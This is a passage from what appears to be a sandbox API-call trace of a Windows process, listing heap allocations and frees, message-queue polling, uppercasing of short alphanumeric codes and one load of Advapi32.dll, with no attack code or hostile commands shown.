wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0195.834] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0195.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0195.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0195.834] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0195.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.835] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0195.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0195.835] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0195.835] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0195.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0195.835] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0195.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.836] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0195.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.836] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0195.837] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0195.837] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0195.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0195.838] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0195.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0195.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0195.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0195.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0195.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.839] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0195.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0195.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.840] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0195.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.840] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0195.840] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0195.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1838 [0195.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0195.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.841] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0195.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0195.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0195.842] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0195.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0195.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0195.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0195.842] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0195.842] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.843] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0195.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0195.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.888] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0195.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0195.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0195.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0195.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0195.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0195.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.889] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0195.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0195.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0195.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0195.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0195.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.890] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.890] RtlAllocateHeap (HeapHandle=0x25c0000, 